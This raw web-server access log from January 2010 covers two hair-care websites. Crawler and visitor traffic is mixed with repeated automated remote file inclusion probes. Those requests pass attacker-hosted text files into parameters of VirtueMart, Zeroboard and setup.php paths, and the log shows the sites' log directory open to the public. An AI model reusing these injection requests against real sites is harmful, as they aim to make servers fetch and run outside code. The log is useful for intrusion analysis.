208.80.193.42 - - [10/Jan/2010:16:00:30 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; FunWebProducts; .NET CLR 1.1.4322; ZangoToolbar 4.8.3; yplus 4.1.00b)" "www.freehairsecrets.com"
58.61.164.39 - - [10/Jan/2010:16:04:05 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15728 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
67.195.112.249 - - [10/Jan/2010:16:13:53 -0800] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
114.80.93.71 - - [10/Jan/2010:16:15:57 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
114.80.93.71 - - [10/Jan/2010:16:15:57 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.growlonghairfast.com"
220.181.7.94 - - [10/Jan/2010:16:31:04 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15728 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
67.195.112.249 - - [10/Jan/2010:16:33:55 -0800] "GET /logs/access_090302.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
66.249.65.123 - - [10/Jan/2010:16:39:55 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
58.61.164.139 - - [10/Jan/2010:16:42:07 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
58.61.164.40 - - [10/Jan/2010:16:48:02 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
58.61.164.141 - - [10/Jan/2010:16:48:19 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13021 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
220.181.7.71 - - [10/Jan/2010:16:48:58 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18731 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
124.115.1.7 - - [10/Jan/2010:16:51:11 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12589 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
124.115.1.8 - - [10/Jan/2010:16:55:02 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "growlonghairfast.com"
58.61.164.140 - - [10/Jan/2010:16:59:25 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7572 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
77.88.25.28 - - [10/Jan/2010:17:00:56 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.112.249 - - [10/Jan/2010:17:02:33 -0800] "GET /logs/access_091019.log HTTP/1.0" 200 561992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
58.61.164.140 - - [10/Jan/2010:17:12:26 -0800] "GET /freehairsecretsphp/viewtopic.php?p=9348 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
220.181.7.56 - - [10/Jan/2010:17:17:08 -0800] "GET /freehairsecretsphp/viewtopic.php?p=11324 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
208.80.193.28 - - [10/Jan/2010:17:21:54 -0800] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; Windows-Media-Player/10.00.00.3990)" "www.growlonghairfast.com"
58.61.164.40 - - [10/Jan/2010:17:21:57 -0800] "GET /freehairsecretsphp/viewtopic.php?p=949 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
220.181.7.85 - - [10/Jan/2010:17:24:48 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15361 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
67.195.112.249 - - [10/Jan/2010:17:46:02 -0800] "GET /logs/access_090824.log HTTP/1.0" 200 817938 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
58.61.164.139 - - [10/Jan/2010:17:49:40 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
124.115.1.7 - - [10/Jan/2010:17:51:44 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
58.61.164.139 - - [10/Jan/2010:18:02:11 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
58.61.164.39 - - [10/Jan/2010:18:02:49 -0800] "GET /freehairsecretsphp/viewtopic.php?p=19121 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
124.115.1.8 - - [10/Jan/2010:18:11:36 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
67.195.115.155 - - [10/Jan/2010:18:23:08 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
67.195.115.155 - - [10/Jan/2010:18:23:08 -0800] "GET / HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
124.115.1.8 - - [10/Jan/2010:18:25:29 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
58.61.164.141 - - [10/Jan/2010:18:29:32 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13319 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:34:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:34:25 -0800] "GET /logs/access_091005.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:34:28 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:34:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:34:37 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:34:37 -0800] "GET /logs/access_091005.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:35:06 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:35:22 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:35:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:35:57 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:35:57 -0800] "GET /logs/access_091005.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:36:06 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:36:06 -0800] "GET /logs/access_091005.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:18:36:07 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.187 - - [10/Jan/2010:18:43:58 -0800] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [10/Jan/2010:19:04:50 -0800] "GET /logs/access.log HTTP/1.1" 200 9599 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
69.65.70.2 - - [10/Jan/2010:19:18:58 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322" "www.freehairsecrets.com"
69.65.70.2 - - [10/Jan/2010:19:18:58 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322" "www.freehairsecrets.com"
209.151.70.1 - - [10/Jan/2010:19:27:24 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 200 926 "-" "libwww-perl/5.833" "www.freehairsecrets.com"
58.61.164.39 - - [10/Jan/2010:19:40:11 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14259 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
209.151.70.1 - - [10/Jan/2010:19:42:00 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
209.151.70.1 - - [10/Jan/2010:19:42:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 200 4947 "-" "libwww-perl/5.833" "www.freehairsecrets.com"
209.151.70.1 - - [10/Jan/2010:19:42:01 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.earlywarninginc.com/.injek/injek.txt? HTTP/1.1" 200 926 "-" "libwww-perl/5.833" "www.freehairsecrets.com"
220.181.7.73 - - [10/Jan/2010:19:51:12 -0800] "GET /freehairsecretsphp/viewtopic.php?p=636 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
204.124.182.252 - - [10/Jan/2010:20:00:06 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14037&sid=52bd64b371a15ea9ff22765a7548400e HTTP/1.0" 200 438 "http://growlonghairfast.com/freehairsecretsphp/viewtopic.php?p=14037&sid=52bd64b371a15ea9ff22765a7548400e" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "growlonghairfast.com"
204.124.182.252 - - [10/Jan/2010:20:00:06 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "growlonghairfast.com"
81.12.13.152 - - [10/Jan/2010:20:10:50 -0800] "GET /logs/access.log//setup.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.12.13.152 - - [10/Jan/2010:20:10:50 -0800] "GET /logs//setup.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
81.12.13.152 - - [10/Jan/2010:20:10:50 -0800] "GET /setup.php?dir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.218.116.134 - - [10/Jan/2010:20:26:14 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
124.115.6.16 - - [10/Jan/2010:20:26:29 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
195.2.240.202 - - [10/Jan/2010:20:32:32 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "growlonghairfast.com"
195.2.240.202 - - [10/Jan/2010:20:32:33 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "growlonghairfast.com"
119.63.198.103 - - [10/Jan/2010:20:33:39 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14352 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
220.181.94.229 - - [10/Jan/2010:20:34:17 -0800] "GET / HTTP/1.1" 200 926 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.freehairsecrets.com"
220.181.94.229 - - [10/Jan/2010:20:34:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.freehairsecrets.com"
195.2.240.202 - - [10/Jan/2010:20:46:32 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "freehairsecrets.com"
195.2.240.202 - - [10/Jan/2010:20:46:33 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461)" "freehairsecrets.com"
72.208.59.220 - - [10/Jan/2010:20:54:26 -0800] "GET /logs/access.log HTTP/1.0" 200 14217 "http://www.freehairsecrets.com/logs/access.log" "Mozilla/5.0 ( Windows; U; Windows 2003; Compaq )" "www.freehairsecrets.com"
218.145.29.142 - - [10/Jan/2010:21:00:16 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.29.142 - - [10/Jan/2010:21:00:16 -0800] "GET /logs/access_091005.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.29.142 - - [10/Jan/2010:21:00:16 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.7.121 - - [10/Jan/2010:21:00:56 -0800] "GET /freehairsecretsphp/viewtopic.php?p=18804 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
67.195.112.249 - - [10/Jan/2010:21:01:42 -0800] "GET /logs/access_090309.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
77.88.25.28 - - [10/Jan/2010:21:12:58 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
119.63.193.75 - - [10/Jan/2010:21:13:59 -0800] "GET /freehairsecretsphp/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
218.145.29.142 - - [10/Jan/2010:21:15:37 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 928 "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.63.193.75 - - [10/Jan/2010:21:16:04 -0800] "GET /freehairsecretsphp/viewtopic.php?p=17995 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
220.181.7.132 - - [10/Jan/2010:21:20:37 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13461 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
77.88.25.28 - - [10/Jan/2010:21:26:26 -0800] "GET /logs/access_091214.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.181.7.122 - - [10/Jan/2010:21:31:22 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13544 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
218.145.29.142 - - [10/Jan/2010:21:33:32 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.29.142 - - [10/Jan/2010:21:33:32 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.freehairsecrets.com"
220.181.94.213 - - [10/Jan/2010:21:35:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
119.63.198.59 - - [10/Jan/2010:21:37:21 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
220.181.7.79 - - [10/Jan/2010:21:42:27 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12115 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
114.80.93.71 - - [10/Jan/2010:21:43:08 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
124.115.0.26 - - [10/Jan/2010:21:44:12 -0800] "GET / HTTP/1.1" 200 926 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.freehairsecrets.com"
218.145.29.142 - - [10/Jan/2010:21:45:32 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.29.142 - - [10/Jan/2010:21:45:32 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.29.142 - - [10/Jan/2010:21:45:32 -0800] "GET /logs/access.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
218.145.29.142 - - [10/Jan/2010:21:52:14 -0800] "GET /logs/access_091005.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.47.80.39 - - [10/Jan/2010:21:55:00 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.freehairsecrets.com"
193.47.80.39 - - [10/Jan/2010:21:55:01 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.freehairsecrets.com"
220.181.7.85 - - [10/Jan/2010:22:08:27 -0800] "GET /freehairsecretsphp/viewtopic.php?p=16780 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:04 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:08 -0800] "GET /logs/access.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:08 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:18 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:19 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:19 -0800] "GET /logs/access.log%20%20/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:26 -0800] "GET /logs/access.log%20%20/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:26 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:26 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:48 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:53 -0800] "GET /logs/access.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:10:53 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:20:30 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:20:30 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:20:31 -0800] "GET /logs/access_091130.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:20:34 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:20:34 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:20:36 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:20:37 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:20:37 -0800] "GET /logs/access_091130.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:20:38 -0800] "GET /logs/access_091130.log//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:21:10 -0800] "GET /?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:21:10 -0800] "GET /logs/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:21:11 -0800] "GET /logs/access_091130.log/?_zb_path=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:26:34 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:26:34 -0800] "GET /skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.223.143.131 - - [10/Jan/2010:22:26:35 -0800] "GET /logs/access.log%20%20//skin/zero_vote/login.php?dir=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
